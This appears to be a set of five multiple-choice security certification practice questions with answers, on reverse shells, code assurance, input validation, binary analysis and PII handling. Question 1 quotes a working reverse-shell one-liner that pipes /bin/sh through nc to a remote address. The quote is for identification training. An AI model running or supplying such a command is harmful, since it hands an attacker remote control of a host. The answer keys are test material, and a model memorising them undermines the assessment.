Question 1

A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?

Options :

A : Network pivoting

B : Host scanning

C : Privilege escalation

D : Reverse shell

Answer: D

Question 2

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?

Options :

A : Containerization

B : Manual code reviews

C : Static and dynamic analysis

D : Formal methods

Answer: D

Question 3

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

Options :

A : Implementing multifactor authentication on the server OS

B : Hashing user passwords on the web application

C : Performing input validation before allowing submission

D : Segmenting the network between the users and the web server

Answer: C

Question 4

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

Options :

A : Code analysis

B : Static analysis

C : Reverse engineering

D : Fuzzing

Answer: B

Question 5

During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safeguarded during an incident?

Options :

A : Implement data encryption and close the data so only the company has access.

B : Ensure permissions are limited in the investigation team and encrypt the data.

C :

Implement data encryption and create a standardized procedure for deleting data that is no longer needed.

D : Ensure that permissions are open only to the company.

Answer: B